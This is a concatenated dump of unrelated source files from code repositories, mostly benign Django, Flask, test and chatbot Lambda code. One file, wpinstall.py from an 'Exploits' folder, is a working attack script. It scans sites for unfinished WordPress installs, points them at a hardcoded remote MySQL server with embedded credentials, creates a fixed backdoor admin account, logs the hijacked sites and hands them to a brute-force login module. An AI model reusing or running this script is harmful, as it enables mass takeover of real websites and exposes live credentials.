t['child_items'] = []
t['child_items'].append(d)
break
return top_items
@dataent.whitelist(allow_guest=True)
def is_chat_enabled():
return bool(dataent.db.get_single_value('Website Settings', 'chat_enable'))
|
[
"38303879+dataent@users.noreply.github.com"
] |
38303879+dataent@users.noreply.github.com
|
e39ec3b82e0551f31532345f993df0e4da0ee93f
|
459185e0e12d486e91fcfff3e6d6174afbdf70db
|
/JEX-V4/Exploits/wpinstall.py
|
84eb5f88c61670e0b117e32045f691f557ac28bc
|
[] |
no_license
|
Hdiaktoros/laravel-dorks
|
e42a1be938b0fdbbf17e6689d50c7f8bcf30c464
|
a9ae0af4a27b522f939b5c1627db3b98f18bb5c3
|
refs/heads/main
| 2023-07-05T02:59:17.032717
| 2021-08-21T16:30:42
| 2021-08-21T16:30:42
| 398,522,099
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,456
|
py
|
# coding=utf-8
from Exploits import printModule
import requests
from random import sample
from BruteForce import Wordpress
# ----------------==---- MY USER AGent ----==----------------
Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0'}
# -------------------- MYSQl SERVER INFO --------------------
HOST = '31.210.78.238'
USER = 'francesco_res'
PASS = 'L30zDTZDTP'[::-1]
DB = 'francesco_reservex'
# ----------------==---- WpInstall Info ----==----------------
username = 'u1337'
password = 'uAdmin@123'
# ------------------------------------------------------------
def RandomGenerator(lenth):
return ''.join(sample('abcdefghijklmnopqrstuvwxyz', lenth))
def WpInstall(site, Email):
session = requests.Session()
RandomStringForPREFIX = str('wp_' + str(RandomGenerator(8)) + '_')
try:
DATA = {
'dbname': DB,
'uname': USER,
'pwd': PASS,
'dbhost': HOST,
'prefix': RandomStringForPREFIX,
'language': 'en_US',
'submit': 'Submit'
}
A = session.post('http://' + site + '/wp-admin/setup-config.php?step=2', data=DATA, headers=Headers, timeout=10)
if 'install.php' in str(A.content):
POSTDATA_Install = {
'weblog_title': 'installed|jex',
'user_name': username,
'admin_password': password,
'pass1-text': password,
'admin_password2': password,
'pw_weak': 'on',
'admin_email': Email,
'Submit': 'Install+WordPress',
'language': 'en_US'
}
session.post('http://' + site + '/wp-admin/install.php?step=2', data=POSTDATA_Install,
headers=Headers, timeout=25)
except:
pass
try:
source = session.get('http://' + site + '/wp-login.php', timeout=10, headers=Headers).content
if 'installed|jex' in str(source):
with open('result/Wp-Installed.txt', 'a') as writer:
writer.write(site + '/wp-login.php\n Username: {}\n'
' Password: {}\n------------------------------------------\n'
.format(username, password))
Login = Wordpress.Wordpress()
Login.BruteForce(site, password, username)
return printModule.returnYes(site, 'N/A', 'Wp-Install', 'Wordpress')
else:
with open('result/Wp-SetupFound.txt', 'a') as writer:
writer.write('{}/wp-admin/setup-config.php\n'.format(site))
return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
except:
return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
def Check(site, email):
try:
PATHz = [
'',
'/wordpress',
'/wp',
'/blog',
'/test',
'/site'
]
x = 0
for path in PATHz:
C = requests.get('http://' + site + path + '/wp-admin/setup-config.php?step=0')
if 'setup-config.php?step=1' in str(C.content):
x += 1
return WpInstall(site + path, email)
if x == 0:
return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
except:
return printModule.returnNo(site, 'N/A', 'Wp-Install', 'Wordpress')
|
[
"frimpongasante50@gmail.com"
] |
frimpongasante50@gmail.com
|
30a66d64f31cafc94958091c752359386e6a4311
|
224bbfdc32d0863f2c01dc8df5d22f99d8ba8a59
|
/Django-Angular-Ionic-Env/Scripts/django-admin.py
|
c1c7b58459de83af3b060986cd7ea54a45f133fb
|
[
"MIT"
] |
permissive
|
ricardoBento/Django-Angular-Ionic
|
f070d4a43e0a8fd5a99aeb55976f17a4937bf081
|
fea23986deb613603a150d11787b609971c7152f
|
refs/heads/master
| 2022-11-10T02:46:17.808929
| 2020-06-29T13:21:37
| 2020-06-29T13:21:37
| 269,649,736
| 0
| 0
|
MIT
| 2020-06-05T13:41:41
| 2020-06-05T13:41:39
| null |
UTF-8
|
Python
| false
| false
| 206
|
py
|
#!c:\users\rbento\documents\github\django-angular-ionic\django-angular-ionic-env\scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
[
"ricardo@flowhospitalitytraining.co.uk"
] |
ricardo@flowhospitalitytraining.co.uk
|
249c8be8faca60c67ed1827c6122bee07e1fa8ac
|
a5a4cee972e487512275c34f308251e6cc38c2fa
|
/tests_old/tests_openmpi/test_hello_world/test_hello_world.py
|
b5a6b03915a4a452b63bb6efdf8838d172ecddf7
|
[
"MIT"
] |
permissive
|
eragasa/pypospack
|
4f54983b33dcd2dce5b602bc243ea8ef22fee86b
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
refs/heads/master
| 2021-06-16T09:24:11.633693
| 2019-12-06T16:54:02
| 2019-12-06T16:54:02
| 99,282,824
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 706
|
py
|
from subprocess import call
import os
# possibly the greatest hack of a test to ever be written
def test_hello_world():
call(["sbatch", "runjob_hipergator.sh"])
while True:
r0 = os.path.exists("rank_0")
r1 = os.path.exists("rank_1")
r2 = os.path.exists("rank_2")
r3 = os.path.exists("rank_3")
err = os.path.exists("job.err")
if all([r0, r1, r2, r3]):
os.remove("rank_0")
os.remove("rank_1")
os.remove("rank_2")
os.remove("rank_3")
assert True
return
if err:
os.remove("job.err")
os.remove("job.out")
assert False
return
|
[
"seatonullberg@gmail.com"
] |
seatonullberg@gmail.com
|
2752c83cd011675845e421f06b6105a534c335c1
|
0b490626a19dae9d2b9da68cebad27ee43c3dec5
|
/python/seqdiff/__main__.py
|
3b756498b413ec01837a11212d0b346101f4a8cd
|
[
"Apache-2.0"
] |
permissive
|
tamuhey/seqdiff
|
1c8e4bb8bafaad069472282835a245a7d2b94ffa
|
4bd79979fbce25989d55644d6e3ca2efbc15edd8
|
refs/heads/master
| 2023-06-15T19:23:41.763124
| 2021-07-13T05:08:16
| 2021-07-13T05:08:16
| 273,475,966
| 5
| 0
| null | 2021-07-13T05:07:25
| 2020-06-19T11:19:56
|
Rust
|
UTF-8
|
Python
| false
| false
| 96
|
py
|
from seqdiff import print_diff
if __name__ == "__main__":
print_diff([1, 2, 3], [1, 3, 4])
|
[
"tamuhey@gmail.com"
] |
tamuhey@gmail.com
|
e843bc323ab895070d72d3d47f9812b5ecceddc9
|
120e2282a264a784a1fa3897f86ed5c318035b0c
|
/single_agent_game_20x10/constant.py
|
fec2348f3ae5f699530ab662d50a3c770f15a67e
|
[] |
no_license
|
macwiatrak/CPR_game_RL
|
5ac1021f4d9d03ba9978964c06e23def28d19d8b
|
297140bfc624f0fd84a7150fdb00aad9a904d7b2
|
refs/heads/master
| 2020-04-16T04:24:50.034200
| 2019-03-27T01:54:30
| 2019-03-27T01:54:30
| 165,266,095
| 0
| 0
| null | 2019-03-27T01:54:31
| 2019-01-11T15:32:27
|
Python
|
UTF-8
|
Python
| false
| false
| 694
|
py
|
foodList = [(2,0), (2,1), (2,2), (1,1), (7,0), (7,1), (7,2),(6,1), (3,1), (8,1), (12,0), (12,1),
(12,2), (11,1), (13,1), (17,0), (17,1), (17,2), (16,1), (18,1), (4,9),
(3,8), (4,8), (4,7), (5,8), (9,9), (9,8), (9,7), (8,8), (10,8), (14,9), (14,8), (14,7),
(13,8), (15,8), (19,9), (19,8), (19,7), (18,8)]
foodList_1 = [(2,0), (2,1), (2,2), (1,1), (7,0), (7,1), (7,2),(6,1), (3,1), (8,1), (12,0), (12,1),
(12,2), (11,1), (13,1), (17,0), (17,1), (17,2), (16,1), (18,1), (4,9),
(3,8), (4,8), (4,7), (5,8), (9,9), (9,8), (9,7), (8,8), (10,8), (14,9), (14,8), (14,7),
(13,8), (15,8), (19,9), (19,8), (19,7), (18,8)]
|
[
"maciej.wiatrak.16@ucl.ac.uk"
] |
maciej.wiatrak.16@ucl.ac.uk
|
df9e7c03601392167c361181c786ab8f9bbea75f
|
9a0b070f3f3501c6ac49b77008af6386ba6876a4
|
/2021/Oct/1012/4012_요리사/s1.py
|
1790bfaecded6f96b64791633700289227062390
|
[
"MIT"
] |
permissive
|
Jin-RHC/daily_algo
|
9f865e1733748465d069f8b484ed061e61fd7f40
|
7985a69bf62621ef88319a035af00b52831fc105
|
refs/heads/main
| 2023-08-26T00:10:21.128812
| 2021-10-25T16:14:26
| 2021-10-25T16:14:26
| 415,309,428
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 605
|
py
|
import sys
sys.stdin = open('input.txt')
from itertools import combinations
T = int(input())
for tc in range(1, T + 1):
N = int(input())
lst = [list(map(int, input().split())) for _ in range(N)]
target = N // 2
comb = combinations(range(N), target)
answer = 100000000000000
for i in comb:
temp_set = set(range(N)) - set(i)
temp_a = sum([lst[r][c] for r in i for c in i])
temp_b = sum([lst[r][c] for r in temp_set for c in temp_set])
if abs(temp_a - temp_b) < answer:
answer = abs(temp_a - temp_b)
print('#{} {}'.format(tc, answer))
|
[
"gksrnrdmlsk@gmail.com"
] |
gksrnrdmlsk@gmail.com
|
7ac53b30a3b57016edf0f73d53b71a70649b08bc
|
410a0fac2282d867aa7e531c40c7289e4484510c
|
/venv/bin/django-admin.py
|
61ab7e2731c49b3611f2427a7932908cf764ede8
|
[] |
no_license
|
NickVazovsky/parser_go
|
922a46ecca1c3def1adcfe3e029c82641247804b
|
a8dc3c082d246e4325d13e7ef1863df7238694cc
|
refs/heads/master
| 2020-07-29T12:50:55.579542
| 2019-09-20T14:31:02
| 2019-09-20T14:31:02
| 209,806,760
| 0
| 0
| null | 2019-09-20T14:26:48
| 2019-09-20T14:13:45
|
Python
|
UTF-8
|
Python
| false
| false
| 164
|
py
|
#!/home/nick/PycharmProjects/new_project/venv/bin/python3
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
[
"nvazovsky@gmail.com"
] |
nvazovsky@gmail.com
|
6c6313683fedb59ebf2b417b4e225337fbb854d1
|
42550b48b3fbb23f2ea95183eddbe29d23370db9
|
/3. Control Flow/2_perulangan.py
|
93f0123c91804b41c5294bb0f0dcd266641d16c8
|
[] |
no_license
|
all4yandaru/Python
|
ad4beafe1e83591c6383dae149f29f492e8e1015
|
b47c66f37c3e9cd35c28942eac64efdb53abe70f
|
refs/heads/master
| 2023-04-26T05:05:55.472699
| 2021-05-27T03:00:59
| 2021-05-27T03:00:59
| 371,228,665
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 562
|
py
|
# for
for huruf in "Dicoding":
print("Huruf {}".format(huruf))
print("=========")
flowers = ['mawar', 'melati', 'anggrek']
for bunga in flowers:
print("flower : {}".format(bunga))
print("=========")
for index in range(len(flowers)):
print('Flowers [{}]: {}'.format(index, flowers[index]))
for i in range(3, 1, -1): # dari 3 sampai 2, step -1
print(i)
for i in range(5, -1, -1):
for j in range(i):
print("*", end="")
print()
# while
count = 0
while count < 7:
print('Hitungannya adalah: {}'.format(count))
count += 2
|
[
"all4yandaru@gmail.com"
] |
all4yandaru@gmail.com
|
bbb3f58b7effacb2400ce12ff121834858bb00af
|
5ff85cb7c0f447b6cd35bd521fde6b0e3fe76443
|
/webcopy1.py
|
1f140b91561f65d4049380294bef59a520cd2eba
|
[] |
no_license
|
priyanshusankhala/Research-paper
|
17d9e72cca31439818631f236d37c9f29319f71e
|
a97bec6239abd8acef6cc8fbbae23706b082b993
|
refs/heads/main
| 2023-07-15T21:02:27.533836
| 2021-08-27T10:21:32
| 2021-08-27T10:21:32
| 366,608,391
| 0
| 0
| null | 2021-05-12T06:08:25
| 2021-05-12T05:59:03
| null |
UTF-8
|
Python
| false
| false
| 12,205
|
py
|
import urllib
import json as m_json
from urllib import request
from urllib.parse import urlparse
import sys
import enchant
from numpy import array
from requests_html import HTMLSession
from collections import Counter
from urllib.parse import urlparse
from bs4 import BeautifulSoup
from urllib.request import urlopen
import numpy as np
from selenium import webdriver
import ssl
import requests
# ''' This code will crawl web to create features for ml model
# Import the above mentioned libraries and then run the class called FeatureCreation
# Class FeatureCreation creates features using different features and extract those features value to
# store it in a list called features
# '''
class FeatureCreation:
def __init__(self):
# self.url = url
# ''' q stand for query here which will the name of company, we store
# that query in self.c_name to be used in where ever company name is required
# '''
q =[]
q = 'abbott'
self.c_name = q
def getURLForQuery(self):
# ''' This function crawls web to fetch the url, title, meta contents
# It uses selenium web crawler, incase it does not work please inspect if containers mentioned find_element_by_xpath might have changed
# title will store the title contents
# link will store the link contents
# detail will store the meta contents
# driver.close() will close selenium web crawler
# '''
# q = self.c_name
# driver = webdriver.Chrome()
# driver.get('https://www.google.com/search?q='+q)
# title = driver.find_element_by_xpath('//div[@class="g"]').find_element_by_xpath('.//h3').text
# link = driver.find_element_by_xpath('//div[@class="g"]').find_element_by_xpath('.//div[@class ="yuRUbf"]/a').get_attribute('href')
# detail = driver.find_element_by_xpath('//div[@class="g"]').find_element_by_xpath('.//div[@class="VwiC3b yXK7lf MUxGbd yDYNvb lyLwlc"]')
# self.title = title
# self.url = link
# self.meta = detail.text
# driver.close()
# print(self.title, self.url)
# return[self.title, self.url, self.meta]
arr1 = []
arr2 = []
arr3 = []
q =[]
q = self.c_name
driver = webdriver.Chrome()
driver.get('https://www.google.com/search?q='+q+'%20WEBSITE&num=4') #+'%20WEBSITE&num=4'
for element in driver.find_elements_by_xpath('//div[@class="g"]'):
##title = element.find_element_by_xpath('.//h3').find_element_by_xpath('.//h3[@class = "LC20lb DKV0Md"]').text
title = element.find_element_by_xpath('.//h3[@class = "LC20lb DKV0Md"]').text
link = element.find_element_by_xpath('.//div[@class ="yuRUbf"]/a').get_attribute('href')
# link = element.find_element_by_xpath('.//div[@class ="yuRUbf"]').find_element_by_xpath('.//div[@class = "TbwUpd NJjxre"]').text
##.find_element_by_xpath('.//cite[@class = "iUh30 Zu0yb qLRx3b tjvcx"]')
##detail = element.find_element_by_xpath('.//div[@class="VwiC3b yXK7lf MUxGbd yDYNvb lyLwlc"]').text
detail = element.find_element_by_xpath('.//div[@class="IsZvec"]').text
#print(detail)
#print(link)
# print(title)
arr1.append(title)
arr2.append(link)
arr3.append(detail)
arr2 = list(filter(None, arr2))
arr1 = list(filter(None, arr1))
arr3 = list(filter(None, arr3))
self.title = arr1
self.url = arr2
self.meta = arr3
#print(arr1, arr2, arr3) # Test
#return self.title
return[self.meta,self.url, self.title]
# driver.close()
# def getURLForQuery(q):
# URLS = []
# for result in q:
# title = result['title']
# meta = result['meta']
# url = result['url'] # was URL in the original and that threw a name error exception
# URLS.append(url)
# return title
# return meta
# return url
# def getURLForQuery(q, query2URLS):
# # query = urllib3.urlencode ( { 'q' : q } )
# # response = urllib3.urlopen ( 'http://googleapis.com/ajax/services/search/web?v=1.0&' + query ).read()
# # json = m_json.loads ( response )
# results = json [ 'responseData' ] [ 'results' ]
# URLS = []
# for result in results:
# title = result['title']
# meta = result['meta']
# url = result['url'] # was URL in the original and that threw a name error exception
# URLS.append(url)
# return title
# return meta
# return url
# query2URLS[q] = URLS
# def getRankedURLSLst(urls):
# # store the rank of each url
# rankedURLSDict = {}
# min_url_rank = sys.maxint
# max_url_rank = -sys.maxint
# for i, url in enumerate(urls):
# return sorted([(k, float(rankedURLSDict[k] - min_url_rank)
def appeared_in_title(self):
# '''This function counts the number of times company name has appeared in title tag of url
# we store title retrieved from web in string and query in substring
# then make both lower to count appeareance
# '''
arr = []
string = self.title
substring = self.c_name
for i in string:
res = i.lower().count(substring.lower())
arr.append(res)
#self.count
self.count = arr
#print(self.count) # Test
return self.count
def appeared_in_meta(self):
# '''This function counts the number of times company name has appeared in meta tag of url
# '''
arr = []
string1 = self.meta
substring1 = self.c_name
for i in string1:
res1 = i.lower().count(substring1.lower())
arr.append(res1)
self.count1 = arr
#print(self.count1) # Test
return self.count1
def title_normalized(self):
arr = []
# ''' This function divides the appeared in title value to no. of words in company name.
# we split the company name to count the number of words in it and then
# divide that number to title appeared
# '''
a_string = self.c_name
word_list = a_string.split()
#Split `a_string` by whitespace
number_of_words = len(word_list)
for i in self.count:
Count = i
TN = Count/number_of_words
arr.append(TN)
#print(arr) #Test
TN = arr
return TN
def meta_normalized(self):
# ''' This function divides the appeared in meta value to no. of words in company name.
# we split the company name to count the number of words in it and then
# divide that number to meta appeared
# '''
arr = []
a_string = self.c_name
word_list = a_string.split()
#Split `a_string` by whitespace
number_of_words = len(word_list)
#Count = appeared_in_meta(count1)
for i in self.count1:
Count = i
MN = Count/number_of_words
arr.append(MN)
#print(arr) #Test
MN = arr
return MN
def lvtn(self):
arr = []
for i in self.title:
s1 = i
s2 = self.c_name
arr.append(enchant.utils.levenshtein(s1, s2))
#print(arr) #Test
return arr
def lvdn(self):
# ''' To obtain the levenshtein distance between domain and query submitted
# it uses enchant library
# '''
#s11 = getURLForQuery(url)
arr1 = []
for i in self.url:
s11 = i
s22 = self.c_name
arr1.append(enchant.utils.levenshtein(s11, s22))
#print(arr1) # Test
return arr1
def no_of_links(self):
arr = []
session = HTMLSession()
for i in self.url:
try:
r = session.get(i,verify=False) # "http://www.abbott.com"
unique_netlocs = Counter(urlparse(link).netloc for link in r.html.absolute_links)
summ = 0
for link in unique_netlocs:
try:
summ += unique_netlocs[link]#print(link, unique_netlocs[link]
except Exception as e:
summ =0
arr.append(summ)
except requests.exceptions.ProxyError:
arr.append(0)
self.summ = arr
#print(self.summ) #Test
return self.summ
#print(arr)
def word_count(self):
# ''' To obtain the total word count in html of a link
# '''
arr = []
for i in self.url:
url = i #"https://aig.com"
context = ssl._create_unverified_context()
#urllib.urlopen("https://no-valid-cert", context=context)
try:
html = urlopen(url, context=context)
soup = BeautifulSoup(html, "html.parser")
type(soup)
all_links = soup.findAll('html')
str_cells = str(all_links)
cleartext = BeautifulSoup(str_cells, "html.parser").get_text()
#print(cleartext)
a_string = cleartext
word_list = a_string.split()
no_of_words = len(word_list)
arr.append(no_of_words)
except urllib.error.HTTPError as e:
#print('0')
arr.append(0)
self.no_of_words = arr
#print(self.no_of_words)#Test
return self.no_of_words
#print(arr)
#return self.no_of_words
def ratio_word_link(self):
no_of_words = self.no_of_words
summ = self.summ
c=[x / y if y else 0 for x, y in zip(no_of_words, summ)]
#print(str(c)) # Test
return c
def cname_in_html(self):
arr =[]
l1 = self.count # float(input("appeared in title "))
l2 = self.count1 #float(input("appeared in meta: "))
for x, y in zip(l1, l2):
if x<=0 and y<=0:
#print(0)
v = 0
#return False
else:
#print(1)
v = 1
arr.append(v)
#print(arr) #Test
return arr
def rank_of_page(self):
names = self.url
numbers = []
num =1
for item in range(len(names)):
if item == len(names) - 1:
break
elif names[item] == names[item+1]:
numbers.append(num)
else:
numbers.append(num)
num = num + 1
numbers.append(num)
return numbers
#print(numbers) # Test
def feature_extract(self):
arr= []
geturl = self.getURLForQuery()
Title = self.appeared_in_title()
TN = self.title_normalized()
Meta = self.appeared_in_meta()
MN = self.meta_normalized()
LVTN = self.lvtn()
LVDN = self.lvdn()
Links = self.no_of_links()
Word = self.word_count()
DCNAIH = self.cname_in_html()
RatioWL = self.ratio_word_link()
ROP = self.rank_of_page()
#v = [ROP, Title, TN, Meta, MN, LVTN, LVDN, Links, Word, DCNAIH, RatioWL]
#mapped = zip(ROP, Title, TN, Meta, MN, LVTN, LVDN, Links, Word, DCNAIH, RatioWL)
#mapped = set(mapped)
#print(mapped)
for v in zip(ROP, Title, TN, Meta, MN, LVTN, LVDN, Links, Word, DCNAIH, RatioWL):
# print([v])
#res = [ v[i] for i in () ]
#res = v[::]
#print(str(res))
#mat1 = np.array(v)
#print(mat1)
#print(mat1[[0]])
#print(v)
arr.append(v)
self.v = arr
return self.v
def get_url(self):
#geturl = self.getURLForQuery()
z = self.url
#print(z)
return z
#return geturl[1]
peag = FeatureCreation()
features = peag.feature_extract()
displayurl = peag.get_url()
|
[
"noreply@github.com"
] |
noreply@github.com
|
cb5db349433375952b79438f4586f8e8eb237a43
|
e9ff9715adbf6ed11d5073c966ae9ab586ff5942
|
/Desktop/code/app.py
|
0f596818aba02088fa0db725d761289e00b9b84b
|
[] |
no_license
|
nischal-sudo/Flask-repo
|
f6dd42234f39dd524fab9f8955002b89e6b27bc9
|
c50ceb7b118935e9eb7e82e66f216b5b1066f41f
|
refs/heads/master
| 2022-12-12T20:52:41.191398
| 2020-09-07T15:14:00
| 2020-09-07T15:14:00
| 292,005,598
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,257
|
py
|
import os
from flask import Flask,request
from flask_restful import Api#An(API) is a set of routines, protocols, and tools for building software applications.
# Basically, an API specifies how software components should interact
from flask_jwt import JWT #security purpose 1
from resources.item import Item,ItemList
from security import authenticate,identity #inheriting
from resources.user import UserRegister
from resources.store import Store,StoreList
app=Flask(__name__)#"creating" a flask app
app.config["SQLALCHEMY_DATABASE_URI"] = os.environ.get("DATABASE_URL","sqlite:///data.db")#2#where to find "data.db" file
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"]=False#SQLAlchemy has its own track modification
app.secret_key = "jose"#security purpose 2
api = Api(app)#a set of functions and procedures "allowing" the creation of applications,creating Api app
jwt = JWT(app,authenticate,identity)#/auth
api.add_resource(Store,"/store/<string:name>")
api.add_resource(Item,"/item/<string:name>")
api.add_resource(StoreList,"/stores")
api.add_resource(ItemList,"/items")
api.add_resource(UserRegister,"/register")
if __name__ == "__main__": #only the file we run is the main
from db import db
db.init_app(app)
app.run(port=5000,debug=True)
|
[
"nischalhp98@gmail.com"
] |
nischalhp98@gmail.com
|
7a6558293f2b26ecc4cad8e89e91cbb1ffb1a202
|
c028e15a5287ad9ca5cf58ccacccaaa9c32f40a4
|
/apps/ex08query_explorer/migrations/0001_initial.py
|
c2fc147748f476bb8079f055679d77dfb272a6be
|
[] |
no_license
|
huyx/django-exercise
|
0f6363c7ae7b0bb5409fa673118e50db221cb9be
|
6d81c8a5c94ee0820dfc56f817be3144c9636c30
|
refs/heads/master
| 2021-07-09T11:15:00.819385
| 2017-10-04T12:33:41
| 2017-10-04T12:33:41
| 105,282,358
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 791
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-04 03:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Query',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=160, verbose_name='标题')),
('description', models.TextField(blank=True, null=True, verbose_name='描述')),
('query', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
],
),
]
|
[
"ycyuxin@qq.com"
] |
ycyuxin@qq.com
|
2b12e572e60b666f33fddfbc79c028ad4366a179
|
9c33da70a0197addfa7fc53786a64ad0eaa06cbb
|
/bubbleSort.py
|
f33e617519563e098bf003936265825e18b844a5
|
[] |
no_license
|
manuellara/dataStructuresPython
|
03e8e554055605dbf47532f4e2085f3ac9e69528
|
f59014b90e2c9260e5bd3ebeefb3780ee54d1df3
|
refs/heads/master
| 2020-03-27T01:57:49.908183
| 2018-08-22T20:26:59
| 2018-08-22T20:26:59
| 145,757,070
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
#Bubble Sort
#Runtime :: O( n )
#Space Complexity :: O( 1 )
#good for small lists
def bubbleSort( list ):
for i in range( 0 , len( list )-1 ):
for j in range( 0 , len( list ) - 1 - i ):
if list[ j ] > list[ j+1 ]:
list[ j ] , list[ j+1 ] = list[ j+1 ] , list[ j ]
return list
|
[
"manuellaraa@gmail.com"
] |
manuellaraa@gmail.com
|
c064a3df67c9e1823f33effe6f863832443c9cf3
|
7f8660729c81b3401147d813ec30fc86e2642c30
|
/python/funkcjee.py
|
fbac1675e083cbae3132c34d3d5d1b20141d4c4c
|
[] |
no_license
|
Patrycja13/gitrepo
|
881e0451933919ef007bf649ea41af3014edb254
|
ea9f9fdce484c477b26cbb25f28261747657261a
|
refs/heads/master
| 2021-07-10T00:01:41.796938
| 2019-03-25T08:29:54
| 2019-03-25T08:29:54
| 103,923,098
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 902
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# funkcjee.py
#
#
import random
def wypelnij(lista, ile, maks):
for i in range(ile):
lista.append(random.randint(0, maks))
return lista
def drukuj(lista):
licznik = 0
for liczba in lista:
if not liczba % 2:
licznik += 1
print("Liczb parzystych ", licznik)
def suma_nieparzyste(lista):
""" Funkcja sumuje wszystkie liczby nieparzyste i z przekazanej listy i wyświetla tę sumę"""
licznik = 0
for liczba in lista:
if not liczba % 2:
licznik += 2
print("Liczb nieparzystych ", licznik)
def main(args):
lista = []
ile = 75
maks = 100
wypelnij(lista, ile, maks)
print(lista )
drukuj(lista)
suma_nieparzyste(lista)
return 0
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
|
[
"patrycja.gawel13@onet.pl"
] |
patrycja.gawel13@onet.pl
|
2baeb00b87da6023b8316c4f129c32db3694b122
|
397dd04f8c7b55575c7c147261957adfa45b0fa9
|
/LF/LF1.py
|
2776a33b6d88c21518bd0ea15dbae50e2a65b3bb
|
[] |
no_license
|
ArminJZ/Dining-Suggestion-Chatbot
|
6556c0f052f2241a5d18afdbe1a8694bc3bf08bb
|
7616e959a78c58bbf1d8b7c92ea5f7148f9629f0
|
refs/heads/master
| 2021-03-30T08:57:13.187622
| 2020-03-17T17:42:59
| 2020-03-17T17:42:59
| 248,034,810
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,935
|
py
|
from botocore.vendored import requests
import json
import os
import time
import dateutil.parser
import logging
import datetime
import urllib
import sys
import boto3
try:
# For Python 3.0 and later
from urllib.error import HTTPError
from urllib.parse import quote
from urllib.parse import urlencode
except ImportError:
# Fall back to Python 2's urllib2 and urllib
from urllib2 import HTTPError
from urllib import quote
from urllib import urlencode
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
def isvalid_city(city):
valid_cities = ['new york', 'manhattan', 'brooklyn', ]
return city.lower() in valid_cities
def isvalid_date(date):
try:
dateutil.parser.parse(date)
return True
except ValueError:
return False
def isvalid_cuisine_type(cuisine_type):
cuisines = ["indian", "italian", "mediterranean", "french", "japanese", "chinese", "spanish", "american", "mexican"]
return cuisine_type.lower() in cuisines
def build_validation_result(isvalid, violated_slot, message_content):
return {
'isValid': isvalid,
'violatedSlot': violated_slot,
'message': {'contentType': 'PlainText', 'content': message_content}
}
def validate_suggest_place(slots):
v_city = slots['Location']
v_date = slots['Date']
v_time = slots['Time']
v_peoplecount = safe_int(slots['NumberOfPeople'])
v_cuisine_type = slots['Cuisine']
if v_city and not isvalid_city(v_city):
return build_validation_result(
False,
'Location',
'We currently do not support {} as a valid destination. Can you try a different city?'.format(v_city)
)
if v_date:
if not isvalid_date(v_date):
return build_validation_result(False, 'Date',
'I did not understand the data you provided. Can you please tell me what date are you planning to go?')
if datetime.datetime.strptime(v_date, '%Y-%m-%d').date() < datetime.date.today():
return build_validation_result(False, 'Date',
'Suggestions cannot be made for date earlier than today. Can you try a different date?')
if v_peoplecount is not None:
num_people = int(v_peoplecount)
if num_people > 20 or num_people < 0:
return build_validation_result(False,
'NumberOfPeople',
'Please add people betweek 0 to 20')
if v_cuisine_type and not isvalid_cuisine_type(v_cuisine_type):
return build_validation_result(
False,
'Cuisine',
'I did not recognize that cuisine. What cuisine would you like to try? '
'Popular cuisines are Japanese, Indian, or Italian')
return {'isValid': True}
def close(session_attributes, fulfillment_state, message):
response = {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'Close',
'fulfillmentState': fulfillment_state,
'message': {'contentType': 'PlainText', 'content': message}
}
}
return response
def elicit_slot(session_attributes, intent_name, slots, slot_to_elicit, message):
return {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'ElicitSlot',
'intentName': intent_name,
'slots': slots,
'slotToElicit': slot_to_elicit,
'message': message
}
}
def delegate(session_attributes, slots):
return {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'Delegate',
'slots': slots
}
}
def safe_int(n):
if n is not None:
return int(n)
return n
def diningSuggestions(intent_request):
location = intent_request['currentIntent']['slots']['Location']
cuisine = intent_request['currentIntent']['slots']['Cuisine']
peopleNum = intent_request['currentIntent']['slots']['NumberOfPeople']
date = intent_request['currentIntent']['slots']['Date']
time_open = intent_request['currentIntent']['slots']['Time']
phone = str(intent_request['currentIntent']['slots']['Phone'])
# cuisine = "chinese"
# phone_num = "+16263285824"
# location = "brooklyn"
# date = "2019-10-17"
# dining_time = "13:00"
# peopleNum = "2"
if phone[:2] != '+1':
phone = '+1' + phone
session_attributes = intent_request['sessionAttributes'] if intent_request['sessionAttributes'] is not None else {}
if intent_request['invocationSource'] == 'DialogCodeHook':
validation_result = validate_suggest_place(intent_request['currentIntent']['slots'])
if not validation_result['isValid']:
intent_request['currentIntent']['slots'][validation_result['violatedSlot']] = None
# print(validation_result['message'])
return elicit_slot(
session_attributes,
intent_request['currentIntent']['name'],
intent_request['currentIntent']['slots'],
validation_result['violatedSlot'],
validation_result['message']
)
return delegate(session_attributes, intent_request['currentIntent']['slots'])
sqsmessage = cuisine + ' ' + str(phone)
# SQS service
sqs = boto3.client('sqs')
queue_url = 'https://sqs.us-east-1.amazonaws.com/584092006642/LF1-to-LF2'
response = sqs.send_message(
QueueUrl=queue_url,
MessageAttributes={
'cuisine': {
'DataType': 'String',
'StringValue': cuisine
},
'phone': {
'DataType': 'String',
'StringValue': phone
},
'location': {
'DataType': 'String',
